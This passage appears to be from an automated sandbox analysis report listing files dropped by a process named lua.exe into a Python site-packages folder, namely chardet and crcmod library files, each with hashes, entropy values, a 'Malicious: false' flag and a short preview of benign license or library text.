SHA-512:	76BC6993ACEA7E0D5720AC36137F6AF42A376D5959BE932A3C9FC636A3BF3D986E6ACDB731B6B615D389A99BF771D3D06D947BB4457B71A9285236CA704955BF
Malicious:	false
Preview:	#!/usr/bin/env python.# -- coding: utf-8 --..from chardet.sbcharsetprober import SingleByteCharSetModel...# 3: Positive.# 2: Likely.# 1: Unlikely.# 0: Negative..TURKISH_LANG_MODEL = {. 23: { # 'A'. 23: 0, # 'A'. 37: 0, # 'B'. 47: 0, # 'C'. 39: 0, # 'D'. 29: 0, # 'E'. 52: 0, # 'F'. 36: 0, # 'G'. 45: 0, # 'H'. 53: 0, # 'I'. 60: 0, # 'J'. 16: 0, # 'K'. 49: 0, # 'L'. 20: 0, # 'M'. 46: 0, # 'N'. 42: 0, # 'O'. 48: 0, # 'P'. 44: 0, # 'R'. 35: 0, # 'S'. 31: 0, # 'T'. 51: 0, # 'U'. 38: 0, # 'V'. 62: 0, # 'W'. 43: 0, # 'Y'. 56: 0, # 'Z'. 1: 3, # 'a'. 21: 0, # 'b'. 28: 0, # 'c'. 12: 2, # 'd'. 2: 3, # 'e'. 18: 0, # 'f'. 27: 1, # 'g'. 25: 1, # 'h'. 3: 1, # 'i'. 24: 0, # 'j'. 10: 2, # 'k'. 5: 1, # 'l'. 1

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\latin1prober.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5370
Entropy (8bit):	4.724145544254619
Encrypted:	false
SSDEEP:	96:Ptzcu4I3PIXMmmmmmOmmmmmmJmmmmmmcmJxBeEJbchy18IuIB+N5:Ptzcu46xBJCxD5
MD5:	4EC6FE5DA8DDBED7AA355DF81BD0E6AF
SHA1:	18AAFA5D34C519C51823A7A4737DD07F79E11DB9
SHA-256:	4B6228391845937F451053A54855AD815C9B4623FA87B0652E574755C94D914F
SHA-512:	F8608DD1F72AFA5355F10F343A69002D80A5287D6968BDB3C9A3493816179E3E8FE265453DE51ADA7F69BDA3549A3545C45E6136B8BD6A9D36F52E77351F84A5
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Publi

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\mbcharsetprober.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3413
Entropy (8bit):	4.691758401653377
Encrypted:	false
SSDEEP:	48:Px/zeL0uwyUjHSU0JMB/0dQ5Wn7c6H5RNMVyylElKBq8CdTIIbu:Ptz/u4GJMB2n7c6HtQyylEl+bCdTIIbu
MD5:	D7BB9DEC5E8045651A957E956E6CFDC7
SHA1:	EEB555BEF8B05F40C0AA6D81BF2B323B875FC653
SHA-256:	011F797851FDBEEA927EF2D064DF8BE628DE6B6E4D3810A85EAC3CB393BDC4B4
SHA-512:	1790596D9A6E1ADA7EBE3D103793445B1EE2393E9CD0964E39BCE5B023CB49F0D387F17F9E8B88BBDBF5F27E183058896EEABB93465ABFCBEB359131E32A9BA4
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.# Proofpoint, Inc..#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\mbcsgroupprober.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2012
Entropy (8bit):	4.937443894092934
Encrypted:	false
SSDEEP:	48:Px/zeL0uwyUjHSP+cWg/bBkPmJsB8acnd+:Ptz/u4MJsBrod+
MD5:	D11B219F9A5CC6B48D492BEB69C3D9C3
SHA1:	9E6D7D608F78DD6AE8D09BFC9D46E41C7F287BB1
SHA-256:	87A4D19E762AD8EC46D56743E493B2C5C755A67EDD1B4ABEBC1F275ABE666E1E
SHA-512:	C0DD5DDC5EDF0BE6E3595A033B050AE8FC2471B805D2295CA7FE01C1F5F6CA005D047A34E8FE047EF682FAB75D8762DE7BAB05D8F4E4359E012ED65F327628EF
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.# Proofpoint, Inc..#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\mbcssm.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	25481
Entropy (8bit):	4.703644928512803
Encrypted:	false
SSDEEP:	192:Kt17u4PJ9G///8/eeeeeHN999999jyTMG/96U////////9eeeeeeeea/99///99M:6u42f17JlwxjpFhHJ
MD5:	3084C6E597BB859E0CDF091E046C9D5E
SHA1:	0501C978D8B4BDB0883F06F604139896AA3634BD
SHA-256:	498DF6C15205DC7CDC8D8DC1684B29CBD99EB5B3522B120807444A3E7EED8E92
SHA-512:	CD72A229BDAD4CAC29334326BF5B2DF59B3551D0591E2794668CF9BA194C2B1301CDD781F904F6CE8561A0A4ABE339A8AEDBF0676914CFA9D433770ED7F7DE3B
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\metadata\languages.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	19474
Entropy (8bit):	4.309626912869515
Encrypted:	false
SSDEEP:	192:otWEL1HNmxATvSK9WwT+X5cdAW4ak4CWD79vACb8sPWvI6QaIeIKl0v48m1wv+am:J/kz97MMveFwpgijRRC
MD5:	F4A09F07D24ADF6500AC136A5F9AE48F
SHA1:	4BEBA4DE69BAB37063E4D564AB9FE9B58BB316E5
SHA-256:	E35B4BAB778B4AB0446C455542954616AF4AEE8D659FD6F51E9635974842510A
SHA-512:	E85987753AF4641FB3D6D2431A2FE78DBC8695922C5A56FA3AE689A04683073D2E690C969EA7661E7ECC1FB3971FE31721BCF372346056366426707C0680C256
Malicious:	false
Preview:	#!/usr/bin/env python.# -- coding: utf-8 --.""".Metadata about languages used by our model training code for our.SingleByteCharSetProbers. Could be used for other things in the future...This code is based on the language metadata from the uchardet project..""".from __future__ import absolute_import, print_function..from string import ascii_letters...# TODO: Add Ukranian (KOI8-U)..class Language(object):. """Metadata about a language useful for training models.. :ivar name: The human name for the language, in English.. :type name: str. :ivar iso_code: 2-letter ISO 639-1 if possible, 3-letter ISO code otherwise,. or use another catalog as a last resort.. :type iso_code: str. :ivar use_ascii: Whether or not ASCII letters should be included in trained. models.. :type use_ascii: bool. :ivar charsets: The charsets we want to support and create data for.. :type charsets: list of str. :ivar alphabet: The characters in the

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\sbcharsetprober.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6136
Entropy (8bit):	4.546497348315648
Encrypted:	false
SSDEEP:	96:Ptzcu4ySB1JHv2+18JlyLpX8895vzCIIgR:Ptzcu4vB7nLm8veK
MD5:	2EBB3D6952540FEA5F8D131376001203
SHA1:	06BB9EA3B9D4E4A3949EF6FDE06C9385FB2A8509
SHA-256:	9E6C8CCAEC731BCEC337A2B7464D8C53324B30B47AF4CAD6A5D9C7CCEC155304
SHA-512:	353B5F18B8F2E7C5387E800996A12997825C5381A73DE3F14134A15BC3353957759782B8915191593ACAB680E6714F7A1080D4CF513A621B903E966F164DA3BD
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Publi

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\sbcsgroupprober.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4309
Entropy (8bit):	4.956208949275685
Encrypted:	false
SSDEEP:	96:Ptzcu4h5jCXCvEXNtLRTbSmJs5JKTFSKqlSiMqIBx7lO1F19d:Ptzcu4h5G4MNtLRTOyBTFSKqlSiMqIBm
MD5:	7E03B10FB4702C16B9E88D5CBC11ADA5
SHA1:	723635EC45B1DBDE8C60BC5D10992E6CC9A1FC6A
SHA-256:	86A79F42E5E6885C83040ACE8EE8C7EA177A5855E5383D64582B310E18F1E557
SHA-512:	9237CE3F5270961339EB6AE8C96014832DB2614A3C921939884927EF7420A2BA881DC3F45FFCDB9FB2CB30AA5FDA8A689F96094A2E9EC2CA5A7AD3408050C0AC
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Publi

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\sjisprober.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3774
Entropy (8bit):	4.692886314249317
Encrypted:	false
SSDEEP:	96:Kt17u4Mp2KY6HtQyylEl+ii/m98jWTIIRpB:Kt17u4MsKY6ieTz
MD5:	49A4BAE5A91B2CDF3E86CCBE5C891978
SHA1:	AC5FA06EF33A62E12D3F676223F2BA443410AD08
SHA-256:	208B7E9598F4589A8AE2B9946732993F8189944F0A504B45615B98F7A7A4E4C4
SHA-512:	EA7A9B2EEED35A999302D3B3721A8766417BCCA52EEED47025FD634647EB2E0311C74845CCD331303867956294BAD4B288840D88BCE562FD33BDDFD7130E29B1
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\universaldetector.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12503
Entropy (8bit):	4.482453581698848
Encrypted:	false
SSDEEP:	192:Ptzcu4QKIAlBCWcu77VT4/SqUvhPvD2o8utlH+f0uTbDYr:mu43LjV5vhnRLtxuHDu
MD5:	35875D1D3B0AA5BA1C9CA0F4EB462F4F
SHA1:	5ADB8B49698EC14F762292A97AB110670BCA4D7D
SHA-256:	0E96535C25F49D41D7C6443DB2BE06671181FE1BDE67A856B77B8CF7872058AB
SHA-512:	CC2E4C7059B10685294D1360DA403D2E645AD829DDE1BFE2C0AEFA29EA7C5438D7E272D83D2A99B414A1BB175C8BED489DCD45E1469A7C1FDAFBA763778369C4
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Publi

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\utf8prober.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2766
Entropy (8bit):	4.833784610060913
Encrypted:	false
SSDEEP:	48:Kx/1ef0uwyUjHSUr/J0/dD2bbIQ6H5RZvMalElKTYtIIJs:Kt17u4R/J0uIQ6Hh9lElLtIIq
MD5:	E6180774C6437E9A396353411EDDCB36
SHA1:	35EF3BB735C68E457746E85E7C410CEB2ADA711A
SHA-256:	21D0FCBF7CD63AC07C38B8B23E2FB2FDFAB08A9445C55F4D73578A04B4AE204C
SHA-512:	77510EBF5AA4A8AB8CDA47A44D538E453F9BFE0A0332094A753CB7DF84DDDA9BB03757D609F9A1809898611F938F5553EEC370197BDEF9182629F2F4FD9250DF
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\version.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	242
Entropy (8bit):	4.9466079118032145
Encrypted:	false
SSDEEP:	6:2EJMHUYLQBHmZvDDntuFFeHNDdESzQPXqMC42VUQF6fIX:8HYGZvVuaXE7vqMUHMIX
MD5:	635CDDE23A2245E469D2C0557BA7A938
SHA1:	3B960A058E546F057A0F7F389D14BB1A63E78190
SHA-256:	0380882C501DF0C4551B51E85CFA78E622BD44B956C95EF76B512DC04F13BE7F
SHA-512:	937F00D9761BF3F181B99C6CAFEED49C20C9FF14B653F900B9E8A841CE26C2F92E469F0F1C788A9DDD3851A26F05AFC6E619E7A0FF09F9B0B22E3286ED44577E
Malicious:	false
Preview:	""".This module exists only to simplify retrieving the version number of chardet.from within setup.py and from chardet subpackages...:author: Dan Blanchard (dan.blanchard@gmail.com)."""..__version__ = "4.0.0".VERSION = __version__.split('.').

C:\ProgramData\ShellExperienceHost\Lib\site-packages\crcmod-1.7.dist-info\INSTALLER Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\crcmod-1.7.dist-info\LICENSE Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1249
Entropy (8bit):	5.04070494667132
Encrypted:	false
SSDEEP:	24:LirmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF9:LiaJHlxE35QHOs5exm3ogF9
MD5:	F9A19291627CAD2D1DFBFCF3C9FB85C2
SHA1:	3EB0123465010AD9F22C49106E26776969C7BCB2
SHA-256:	89480768826F408DAEA1F3CAFF0509C2CC9606E10F6BB0CCFD12A3D604842C35
SHA-512:	29541796FD09CD8F58219C98C2A746968450D1ADC1DFB7EAFBE176BA4C6FA455F70DD015FD5FF3AB278A9573B9E01FF8748373383443EC60CD6C659AD0709572
Malicious:	false
Preview:	----------------------------------------------------------------------------.Copyright (c) 2010 Raymond L. Buvel.Copyright (c) 2010 Craig McQueen..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR

C:\ProgramData\ShellExperienceHost\Lib\site-packages\crcmod-1.7.dist-info\METADATA Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5229
Entropy (8bit):	4.846161954007381
Encrypted:	false
SSDEEP:	96:DjuwqzQIhjVMjaacaR+oU3WbIyAwHkBxOXJbTuyE7LNAP6jPqxgqvzGK:fIo6Wb95ppGL+P6LqiK
MD5:	AB922C1674D4D9F69A8A0356A92120CC
SHA1:	499BC209B98FBB2A3312EE27E7A8621E1774123B
SHA-256:	0781A005195519B65AEDBB6FE9D8D79DBC5A2B446CCBB3FA0F456014CDCB6AFB
SHA-512:	A38052447C6BBEB251C3A5E2E92322BE41279F8C1FE935DDD09A4BC42279E2BD6268EB99004C008E5B34B8E409F45C9D152FD164F7C1F6289760BBDF4B067D28
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: crcmod.Version: 1.7.Summary: CRC Generator.Home-page: http://crcmod.sourceforge.net/.Author: Ray Buvel.Author-email: rlbuvel@gmail.com.License: MIT.Download-URL: http://sourceforge.net/projects/crcmod.Platform: UNKNOWN.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Intended Audience :: Education.Classifier: Intended Audience :: End Users/Desktop.Classifier: Intended Audience :: Information Technology.Classifier: Intended Audience :: Science/Research.Classifier: License :: OSI Approved :: MIT License.Classifier: Operating System :: OS Independent.Classifier: Programming Language :: C.Classifier: Programming Language :: C++.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 2.Classifier: Programming Language :: Python :: 2.4.Classifier: Programming Language :: Python :: 2.5.Classifier: Programming Language :: Python :: 2.6.Classifier: Programming Language ::

C:\ProgramData\ShellExperienceHost\Lib\site-packages\crcmod-1.7.dist-info\RECORD Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1150
Entropy (8bit):	5.849684276155682
Encrypted:	false
SSDEEP:	24:an/2zDNvxXolXAaEsJMeT+blHVC76t8im9oOWF14LqyZk:anuXNZYlXAa5JMe6blHVC7O8iwoOWF15
MD5:	97AEB70CCAD640E041A8E945A4FC8876
SHA1:	62C69BCDC551CEC9262CB27A8CDB4B77C79FFC3C
SHA-256:	C022901B1BCB86704B9A0CEFC91DC5DCA6BBCC27A526CA22D48C15377E235515
SHA-512:	8A88D3F944626F2CA294DE119508328F654272572EAF29E04BB20332D3D541787CE5D26AAFF914AEB517E76151C84B3D32B67F61822BEB5EDE405E6E765D95BE
Malicious:	false
Preview:	crcmod-1.7.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..crcmod-1.7.dist-info/LICENSE,sha256=iUgHaIJvQI2uofPK_wUJwsyWBuEPa7DM_RKj1gSELDU,1249..crcmod-1.7.dist-info/METADATA,sha256=B4GgBRlVGbZa7btv6djXnbxaK0Rsy7P6D0VgFM3Lavs,5229..crcmod-1.7.dist-info/RECORD,,..crcmod-1.7.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..crcmod-1.7.dist-info/WHEEL,sha256=OqRkF0eY5GHssMorFjlbTIq072vpHpF60fIQA6lS9xA,92..crcmod-1.7.dist-info/top_level.txt,sha256=cAzaN03P6VQ8WGDLTMMtjwtm-Nm-xzRFhEdYAVSHLY0,7..crcmod/__init__.py,sha256=CPAYCR1UEkQ-odKmeqN0rEW2DRUNyAl94O7DGFgv3Wo,194..crcmod/__pycache__/__init__.cpython-37.pyc,,..crcmod/__pycache__/_crcfunpy.cpython-37.pyc,,..crcmod/__pycache__/crcmod.cpython-37.pyc,,..crcmod/__pycache__/predefined.cpython-37.pyc,,..crcmod/__pycache__/test.cpython-37.pyc,,..crcmod/_crcfunpy.py,sha256=BGuKDD40o5kgI12HjlAi7WlR33QDFFStr1i95GUuqiA,3702..crcmod/crcmod.py,sha256=LONNVL0hChZ4UWHVyuC5GJSkuoVF6KbwR7sIIJpnKds,16610..c

C:\ProgramData\ShellExperienceHost\Lib\site-packages\crcmod-1.7.dist-info\WHEEL Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	92
Entropy (8bit):	4.842566724466667
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlViHoKKjP+tPCCfA5S:RtBMwlViQWBBf
MD5:	11AA48DBE7E7CC631B11DD66DC493AEB
SHA1:	249FDB01AD3E3F71356E33E1897D06F23CFB20C2
SHA-256:	3AA464174798E461ECB0CA2B16395B4C8AB4EF6BE91E917AD1F21003A952F710
SHA-512:	EDD5892C9B2FE1F2439C53D2CD05F4478EC360885054BD06AFCF7936F6D066377FEE07796DAE9ECDF810E3D6100E039CAD48F00AD0E3145693D53E844CC5319D
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.36.2).Root-Is-Purelib: true.Tag: py3-none-any..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\crcmod-1.7.dist-info\top_level.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7
Entropy (8bit):	2.5216406363433186
Encrypted:	false
SSDEEP:	3:0k:0k
MD5:	DEE9F49FD48366B96CC4F2530A805376
SHA1:	EC013A848E717F241E1D11E029CC5C631DBD40F1
SHA-256:	700CDA374DCFE9543C5860CB4CC32D8F0B66F8D9BEC734458447580154872D8D
SHA-512:	F80AC80C77E25707286B1CAC148921DA13138F45A90D0227899D7385DF320F8353607A0AA57BF1702F4768F431B8B7982947BA2BD03D5F80A890D660A8CC2218
Malicious:	false
Preview:	crcmod.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\crcmod\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	194
Entropy (8bit):	4.161784120000959
Encrypted:	false
SSDEEP:	6:1mQjxlLQRIaBkAefpLXwWSE9xmfMm2xlLQPkAeC6rZ6E:MQNKRxBJSRwrE92p6KPkBrEE
MD5:	69E9562916AF5A4E875E05938E4445B8
SHA1:	6991C51F4D8D2FECC0574EB67B2AD598CABF36CD
SHA-256:	08F018091D5412443EA1D2A67AA374AC45B60D150DC8097DE0EEC318582FDD6A
SHA-512:	1D92848A2E7B0FA2840CF3189D5A9432B182D46BD94AB12DC5CCAAF56F89C53022FB4A4357CDEB05FDCB51BB582397FCD42A42378D2AD3701E036C59FC4705C9
Malicious:	false
Preview:	try:. from crcmod.crcmod import . import crcmod.predefined.except ImportError:. # Make this backward compatible. from crcmod import . import predefined.__doc__ = crcmod.__doc__.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\crcmod\_crcfunpy.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3702
Entropy (8bit):	5.082949493394892
Encrypted:	false
SSDEEP:	96:I0d+I+WhuQHWSowT8yz5Fz5QeBI5gH59cdg5T/5G6Bg52X5RnRg5v3w:D+I+7QHWSh8+3bemoadDGMv2Bw
MD5:	2F365507B16F4DDDB2175EB6B5203F63
SHA1:	276E7674B55760D4C7DF2C6768C43723F69E3EBA
SHA-256:	046B8A0C3E34A39920235D878E5022ED6951DF74031454ADAF58BDE4652EAA20
SHA-512:	77C31AC5E436EF51E794CA87644F1EA102F5E118DA29436F82AC0277E68DEDC9C1FCF0A8FBEA64D444FC8562445A85C0521A3B1914FAC035DA45781884A2B4D2
Malicious:	false
Preview:	#-----------------------------------------------------------------------------.# Low level CRC functions for use by crcmod. This version is implemented in.# Python for a couple of reasons. 1) Provide a reference implememtation..# 2) Provide a version that can be used on systems where a C compiler is not.# available for building extension modules..#.# Copyright (c) 2009 Raymond L. Buvel.# Copyright (c) 2010 Craig McQueen.#.# Permission is hereby granted, free of charge, to any person obtaining a copy.# of this software and associated documentation files (the "Software"), to deal.# in the Software without restriction, including without limitation the rights.# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.# copies of the Software, and to permit persons to whom the Software is.# furnished to do so, subject to the following conditions:.# .# The above copyright notice and this permission notice shall be included in.# all copies or substantial portions of the S

C:\ProgramData\ShellExperienceHost\Lib\site-packages\crcmod\crcmod.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	16610
Entropy (8bit):	4.731501649308755
Encrypted:	false
SSDEEP:	192:6QHWS8QVTFDoYDSe55bBnhea7a1ozHAYqA9tlJrfvSiK+mulTiX761QiK8RKqxoz:6jS3hZoK5blhRgIlF6i9UUHYqwx
MD5:	72A8641CA82748E1DA18D2C060D0169F
SHA1:	EC28B5069CAD341480C01EE773E9E31FEB98A080
SHA-256:	2CE34D54BD210A16785161D5CAE0B91894A4BA8545E8A6F047BB08209A6729DB
SHA-512:	79127557FD0EDC7CFA5328DC5FC8510916B145312B773917CA7B3F408E7994B572B9BA0FBF38F5A0599C86A493F12A520F319DD1C0D3854878646BB7436AE8EE
Malicious:	false
